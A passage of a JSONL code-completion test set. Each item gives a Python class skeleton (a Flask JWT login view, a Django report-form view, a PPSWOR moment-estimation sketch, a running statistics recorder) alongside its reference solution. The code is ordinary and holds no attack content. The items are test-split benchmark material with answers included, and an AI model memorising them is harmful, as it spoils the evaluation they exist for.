token.decode('UTF-8')})\n<|end_body_1|>\n", "class_docstring": "", "class_name": "UserLogin", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserLogin:\n\n def get(self):\n \"\"\"当前登录用户\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"用户登录\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = g.login_user\n buckets_count, files_count, files_size, files_types = user_space_count(user)\n user.buckets_count = buckets_count\n user.files_count = files_count\n user.files_size = files_size\n user.files_types = files_types\n return success_response(data=user)\n<|end_body_0|>\n\n<|body_start_1|>\n body_data = request.get_json()\n user = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\n if user is None:\n raise ProfileError(code=404, message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\n if not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\n expire_time = datetime.now() + timedelta(minutes=30)\n token = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\n user.last_login_time = datetime.now()\n user.last_login_ip = request.remote_addr\n db.session.commit()\n return success_response(data={'token': token.decode('UTF-8')})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000370", "length_bytes": 2556, "license_type": "no_license", "methods": [{"docstring": "当前登录用户", "name": "get", "signature": "def get(self)"}, {"docstring": "用户登录", "name": "post", "signature": "def post(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005060", "prompt": "Implement the Python class `UserLogin` described below.\n\nClass description:\nImplement the UserLogin class.\n\nMethod signatures and docstrings:\n- def get(self): 当前登录用户\n- def post(self): 用户登录", "prompted_full_text": "Implement the Python class `UserLogin` described below.\n\nClass description:\nImplement the UserLogin class.\n\nMethod signatures and docstrings:\n- def get(self): 当前登录用户\n- def post(self): 用户登录\n\n<|skeleton|>\nclass UserLogin:\n\n def get(self):\n \"\"\"当前登录用户\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"用户登录\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = g.login_user\n buckets_count, files_count, files_size, files_types = user_space_count(user)\n user.buckets_count = buckets_count\n user.files_count = files_count\n user.files_size = files_size\n user.files_types = files_types\n return success_response(data=user)\n<|end_body_0|>\n\n<|body_start_1|>\n body_data = request.get_json()\n user = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\n if user is None:\n raise ProfileError(code=404, message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\n if not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\n expire_time = datetime.now() + timedelta(minutes=30)\n token = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\n user.last_login_time = datetime.now()\n user.last_login_ip = request.remote_addr\n db.session.commit()\n return success_response(data={'token': token.decode('UTF-8')})\n<|end_body_1|>\n", "revision_id": "c0ec16c0144d3754e67e295babef4417703102dc", "skeleton": "<|skeleton|>\nclass UserLogin:\n\n def get(self):\n \"\"\"当前登录用户\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"用户登录\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserLogin:\n def get(self):\n \"\"\"当前登录用户\"\"\"\n user = g.login_user\n buckets_count, files_count, files_size, files_types = user_space_count(user)\n user.buckets_count = buckets_count\n user.files_count = files_count\n user.files_size = files_size\n user.files_types = files_types\n return success_response(data=user)\n\n def post(self):\n \"\"\"用户登录\"\"\"\n body_data = request.get_json()\n user = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\n if user is None:\n raise ProfileError(code=404, message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\n if not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\n expire_time = datetime.now() + timedelta(minutes=30)\n token = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\n user.last_login_time = datetime.now()\n user.last_login_ip = request.remote_addr\n db.session.commit()\n return success_response(data={'token': token.decode('UTF-8')})\n", "source": "the_stack_v2_python_sparse", "source_path": "nemi_flask/Api_v1_0/namespace_auth/views.py", "source_repo": "Athrun1027/Nemi", "split": "test", "star_events_count": 1} {"blob_id": "0cb010fec95294db88560c917b9bb2ec7568225b", "bodies": ["form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\nform.instance.type = 'PF'\nreturn super().form_valid(form)", "context = super().get_context_data(**kwargs)\ncontext['name'] = Profile.objects.get(pk=self.kwargs['id']).name\nreturn context"], "bodies_text": "<|body_start_0|>\n form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'PF'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Profile.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "class_docstring": "Class based view for reporting profile", "class_name": "ProfileReportForm", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProfileReportForm:\n \"\"\"Class based view for reporting profile\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'PF'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Profile.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000371", "length_bytes": 10733, "license_type": "permissive", "methods": [{"docstring": "Ensures hidden form values are filled", "name": "form_valid", "signature": "def form_valid(self, form)"}, {"docstring": "Passes item name to template", "name": "get_context_data", "signature": "def get_context_data(self, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005940", "prompt": "Implement the Python class `ProfileReportForm` described below.\n\nClass description:\nClass based view for reporting profile\n\nMethod signatures and docstrings:\n- def form_valid(self, form): Ensures hidden form values are filled\n- def get_context_data(self, **kwargs): Passes item name to template", "prompted_full_text": "Implement the Python class `ProfileReportForm` described below.\n\nClass description:\nClass based view for reporting profile\n\nMethod signatures and docstrings:\n- def form_valid(self, form): Ensures hidden form values are filled\n- def get_context_data(self, **kwargs): Passes item name to template\n\n<|skeleton|>\nclass ProfileReportForm:\n \"\"\"Class based view for reporting profile\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'PF'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Profile.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "revision_id": "6bf8e75a1f279ac584daa4ee19927ffccaa67551", "skeleton": "<|skeleton|>\nclass ProfileReportForm:\n \"\"\"Class based view for reporting profile\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProfileReportForm:\n \"\"\"Class based view for reporting profile\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'PF'\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n context = super().get_context_data(**kwargs)\n context['name'] = Profile.objects.get(pk=self.kwargs['id']).name\n return context\n", "source": "the_stack_v2_python_sparse", "source_path": "rameniaapp/views/report.py", "source_repo": "awlane/ramenia", "split": "test", "star_events_count": 0} {"blob_id": "8be088dda6bf281c0a914a1d9b5ca899b01e3fc0", "bodies": ["self.k = k\nself.elements = {}\nself.func_of_freq = lambda x: x ** p\nself.sample_p = sample_p", "if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\nseed = np.random.exponential(1.0 / value ** self.sample_p)\nself.elements[key] = (seed, value)\nif len(self.elements) > 2 * self.k:\n self._remove_additional_elements()", "sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\nfor i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]", "if len(self.elements) > self.k:\n self._remove_additional_elements()\nmax_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\nthreshold = max_in_sample[1][0]\nsum_estimator = 0.0\nfor key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\nreturn sum_estimator"], "bodies_text": "<|body_start_0|>\n self.k = k\n self.elements = {}\n self.func_of_freq = lambda x: x ** p\n self.sample_p = sample_p\n<|end_body_0|>\n\n<|body_start_1|>\n if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\n seed = np.random.exponential(1.0 / value ** self.sample_p)\n self.elements[key] = (seed, value)\n if len(self.elements) > 2 * self.k:\n self._remove_additional_elements()\n<|end_body_1|>\n\n<|body_start_2|>\n sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\n for i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]\n<|end_body_2|>\n\n<|body_start_3|>\n if len(self.elements) > self.k:\n self._remove_additional_elements()\n max_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\n threshold = max_in_sample[1][0]\n sum_estimator = 0.0\n for key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\n return sum_estimator\n<|end_body_3|>\n", "class_docstring": "A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.", "class_name": "PpsworSketch", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PpsworSketch:\n \"\"\"A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\"\"\"\n\n def __init__(self, k, p, sample_p=1):\n \"\"\"Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\"\"\"\n <|body_0|>\n\n def process(self, key, value):\n \"\"\"Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\"\"\"\n <|body_1|>\n\n def _remove_additional_elements(self):\n \"\"\"Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\"\"\"\n <|body_2|>\n\n def estimate_moment(self):\n \"\"\"Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.k = k\n self.elements = {}\n self.func_of_freq = lambda x: x ** p\n self.sample_p = sample_p\n<|end_body_0|>\n\n<|body_start_1|>\n if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\n seed = np.random.exponential(1.0 / value ** self.sample_p)\n self.elements[key] = (seed, value)\n if len(self.elements) > 2 * self.k:\n self._remove_additional_elements()\n<|end_body_1|>\n\n<|body_start_2|>\n sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\n for i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]\n<|end_body_2|>\n\n<|body_start_3|>\n if len(self.elements) > self.k:\n self._remove_additional_elements()\n max_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\n threshold = max_in_sample[1][0]\n sum_estimator = 0.0\n for key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\n return sum_estimator\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000372", "length_bytes": 24996, "license_type": "permissive", "methods": [{"docstring": "Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.", "name": "__init__", "signature": "def __init__(self, k, p, sample_p=1)"}, {"docstring": "Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)", "name": "process", "signature": "def process(self, key, value)"}, {"docstring": "Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).", "name": "_remove_additional_elements", "signature": "def _remove_additional_elements(self)"}, {"docstring": "Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment", "name": "estimate_moment", "signature": "def estimate_moment(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000298", "prompt": "Implement the Python class `PpsworSketch` described below.\n\nClass description:\nA simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\n\nMethod signatures and docstrings:\n- def __init__(self, k, p, sample_p=1): Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\n- def process(self, key, value): Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\n- def _remove_additional_elements(self): Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\n- def estimate_moment(self): Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment", "prompted_full_text": "Implement the Python class `PpsworSketch` described below.\n\nClass description:\nA simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\n\nMethod signatures and docstrings:\n- def __init__(self, k, p, sample_p=1): Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\n- def process(self, key, value): Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\n- def _remove_additional_elements(self): Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\n- def estimate_moment(self): Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment\n\n<|skeleton|>\nclass PpsworSketch:\n \"\"\"A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\"\"\"\n\n def __init__(self, k, p, sample_p=1):\n \"\"\"Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\"\"\"\n <|body_0|>\n\n def process(self, key, value):\n \"\"\"Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\"\"\"\n <|body_1|>\n\n def _remove_additional_elements(self):\n \"\"\"Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\"\"\"\n <|body_2|>\n\n def estimate_moment(self):\n \"\"\"Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.k = k\n self.elements = {}\n self.func_of_freq = lambda x: x ** p\n self.sample_p = sample_p\n<|end_body_0|>\n\n<|body_start_1|>\n if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\n seed = np.random.exponential(1.0 / value ** self.sample_p)\n self.elements[key] = (seed, value)\n if len(self.elements) > 2 * self.k:\n self._remove_additional_elements()\n<|end_body_1|>\n\n<|body_start_2|>\n sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\n for i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]\n<|end_body_2|>\n\n<|body_start_3|>\n if len(self.elements) > self.k:\n self._remove_additional_elements()\n max_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\n threshold = max_in_sample[1][0]\n sum_estimator = 0.0\n for key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\n return sum_estimator\n<|end_body_3|>\n", "revision_id": "727ec399ad17b4dd1f71ce69a26fc3b0371d9fa7", "skeleton": "<|skeleton|>\nclass PpsworSketch:\n \"\"\"A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\"\"\"\n\n def __init__(self, k, p, sample_p=1):\n \"\"\"Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\"\"\"\n <|body_0|>\n\n def process(self, key, value):\n \"\"\"Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\"\"\"\n <|body_1|>\n\n def _remove_additional_elements(self):\n \"\"\"Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\"\"\"\n <|body_2|>\n\n def estimate_moment(self):\n \"\"\"Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PpsworSketch:\n \"\"\"A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\"\"\"\n\n def __init__(self, k, p, sample_p=1):\n \"\"\"Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\"\"\"\n self.k = k\n self.elements = {}\n self.func_of_freq = lambda x: x ** p\n self.sample_p = sample_p\n\n def process(self, key, value):\n \"\"\"Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\"\"\"\n if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\n seed = np.random.exponential(1.0 / value ** self.sample_p)\n self.elements[key] = (seed, value)\n if len(self.elements) > 2 * self.k:\n self._remove_additional_elements()\n\n def _remove_additional_elements(self):\n \"\"\"Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\"\"\"\n sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\n for i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]\n\n def estimate_moment(self):\n \"\"\"Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment\"\"\"\n if len(self.elements) > self.k:\n self._remove_additional_elements()\n max_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\n threshold = max_in_sample[1][0]\n sum_estimator = 0.0\n for key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\n return sum_estimator\n", "source": "the_stack_v2_python_sparse", "source_path": "moment_advice/moment_advice.py", "source_repo": "Ayoob7/google-research", "split": "test", "star_events_count": 2} {"blob_id": "dc8908acbe8419473fc88fe51b25882824298413", "bodies": ["if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\nelse:\n self.nobservations = 0", "if self.nobservations == 0:\n self.__init__(data)\nelse:\n data = np.transpose(np.atleast_2d(data))\n if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n"], "bodies_text": "<|body_start_0|>\n if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\n else:\n self.nobservations = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.nobservations == 0:\n self.__init__(data)\n else:\n data = np.transpose(np.atleast_2d(data))\n if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n\n<|end_body_1|>\n", "class_docstring": "", "class_name": "StatsRecorder", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StatsRecorder:\n\n def __init__(self, data=None):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_0|>\n\n def update(self, data):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\n else:\n self.nobservations = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.nobservations == 0:\n self.__init__(data)\n else:\n data = np.transpose(np.atleast_2d(data))\n if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000373", "length_bytes": 13008, "license_type": "no_license", "methods": [{"docstring": "data: ndarray, shape (nobservations, ndimensions)", "name": "__init__", "signature": "def __init__(self, data=None)"}, {"docstring": "data: ndarray, shape (nobservations, ndimensions)", "name": "update", "signature": "def update(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `StatsRecorder` described below.\n\nClass description:\nImplement the StatsRecorder class.\n\nMethod signatures and docstrings:\n- def __init__(self, data=None): data: ndarray, shape (nobservations, ndimensions)\n- def update(self, data): data: ndarray, shape (nobservations, ndimensions)", "prompted_full_text": "Implement the Python class `StatsRecorder` described below.\n\nClass description:\nImplement the StatsRecorder class.\n\nMethod signatures and docstrings:\n- def __init__(self, data=None): data: ndarray, shape (nobservations, ndimensions)\n- def update(self, data): data: ndarray, shape (nobservations, ndimensions)\n\n<|skeleton|>\nclass StatsRecorder:\n\n def __init__(self, data=None):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_0|>\n\n def update(self, data):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\n else:\n self.nobservations = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.nobservations == 0:\n self.__init__(data)\n else:\n data = np.transpose(np.atleast_2d(data))\n if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n\n<|end_body_1|>\n", "revision_id": "28a59f3182f0ba58ba582449377c6588af1d4cde", "skeleton": "<|skeleton|>\nclass StatsRecorder:\n\n def __init__(self, data=None):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_0|>\n\n def update(self, data):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StatsRecorder:\n def __init__(self, data=None):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\n else:\n self.nobservations = 0\n\n def update(self, data):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n if self.nobservations == 0:\n self.__init__(data)\n else:\n data = np.transpose(np.atleast_2d(data))\n if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n\n", "source": "the_stack_v2_python_sparse", "source_path": "]tasks/2018.11.06.domain_baselines/dtda_gaussian_recorder.py", "source_repo": "bohaohuang/sis", "split": "test", "star_events_count": 2} {"blob_id": 